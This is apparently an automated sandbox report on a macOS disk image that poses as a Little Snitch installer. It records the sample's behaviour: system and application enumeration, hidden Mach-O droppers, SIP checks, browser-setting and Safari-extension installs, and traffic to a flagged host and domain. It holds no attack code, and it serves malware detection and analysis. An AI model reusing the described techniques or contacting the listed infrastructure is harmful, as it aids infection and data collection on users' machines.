Source: /Volumes/Little_Snitch_583_MAC_OS_X/Installer.app/Contents/MacOS/Installer (PID: 653) - Sysctl requested: kern.hostname (1.10)
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 674) - Sysctl requested: kern.hostname (1.10)
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 678) - Sysctl requested: kern.hostname (1.10)
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 693) - Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 701) - Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 710) - Sysctl requested: kern.hostname (1.10)
Reads the system or server version plist file
Source: /Volumes/Little_Snitch_583_MAC_OS_X/Installer.app/Contents/MacOS/Installer (PID: 653) - System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 674) - System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 678) - System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 693) - System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697) - System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/open (PID: 701) - System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/open (PID: 710) - System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/open (PID: 722) - System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /Applications/Safari.app/Contents/MacOS/Safari (PID: 702) - System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /Users/henry/Library/Application Support/Agent/tapufind (PID: 713) - System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist

Stealing of Sensitive Information:

Executes the "system_profiler" command used to collect detailed system hardware and software information
Source: /Volumes/Little_Snitch_583_MAC_OS_X/Installer.app/Contents/MacOS/Installer (PID: 653) - System_profiler executable: /usr/sbin/system_profiler -> /usr/sbin/system_profiler SPHardwareDataType
Source: /usr/sbin/system_profiler (PID: 658) - System_profiler executable: /usr/sbin/system_profiler -> /usr/sbin/system_profiler -nospawn -xml SPHardwareDataType -detailLevel full
Source: /usr/sbin/system_profiler (PID: 660) - System_profiler executable: /usr/sbin/system_profiler -> /usr/sbin/system_profiler -nospawn -xml SPHardwareDataType -detailLevel full
Lists all applications within the /Applications directory
Source: /Volumes/Little_Snitch_583_MAC_OS_X/Installer.app/Contents/MacOS/Installer (PID: 653) - Ls command executed: /bin/ls /Applications


Runtime Messages

Command: open
Exit Code: 0
Exit Code Info:
Killed: False
Standard Output:
Standard Error:

Behavior Graph

Behavior Graph ID: 69635  Sample: setup.dmg  Startdate: 14/02/2019  Architecture: MAC  Score: 88

Network nodes:
  34.225.153.59 (ports 10000, 49283, 49284), AMAZON-AES-AmazoncomIncUS, United States - Detected TCP or UDP traffic on non-standard ports
  www.rached.space
  58 other IPs or domains
Signatures on the sample: Found C&C like URL pattern; Uses known network protocols on non-standard ports

Process tree:
  xpcproxy > Installer (9 created files)
    dropped: /Users/henry/Libra...gggkfl1b0pp5pt5sadh (bzip2); /Users/henry/Libra...1139MAC/Temp/mcwnet (VAX); /Users/henry/Library/X2441139MAC/Temp/chs (ISO)
    signatures: Modifies or sets the kMDItemWhereFroms metadata storing the file's origin; Executes the "system_profiler" command used to collect detailed system hardware and software information; Lists all applications within the /Applications directory; Attaches disk images with shell command 'hdiutil'
    started:
      macsearch (9 created files)
        dropped: /private/tmp/tapuf...t.nosync02b9.raddFF (Mach-O); /private/tmp/tapuf...t.nosync02b9.o9GXrL (Mach-O); /private/tmp/tapuf...t.nosync02b9.DAOwrT (Mach-O); /Users/henry/Libra...port/Agent/tapufind (Mach-O)
        signatures: Executes the "csrutil" command used to retrieve or modify the "System Integrity Protection" configuration; Creates hidden Mach-O files; Writes Mach-O files to untypical directories
        started: sh open; sh open; ChromeAndFirefoxSetter; 7 other processes
      ditto (4 created files)
        dropped: /private/tmp/macse.../MacOS/.BC.T_5fp5Ob (Mach-O)
      system_profiler
        signatures: Executes the "system_profiler" command used to collect detailed system hardware and software information
        started: system_profiler
      12 other processes
        started: diskimages-helper (three instances, each starting a further diskimages-helper); system_profiler
  xpcproxy > Safari (14 created files)
    signatures: Installs Safari extensions
  xpcproxy > tapufind (2 created files)
  4 other processes

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Screenshots
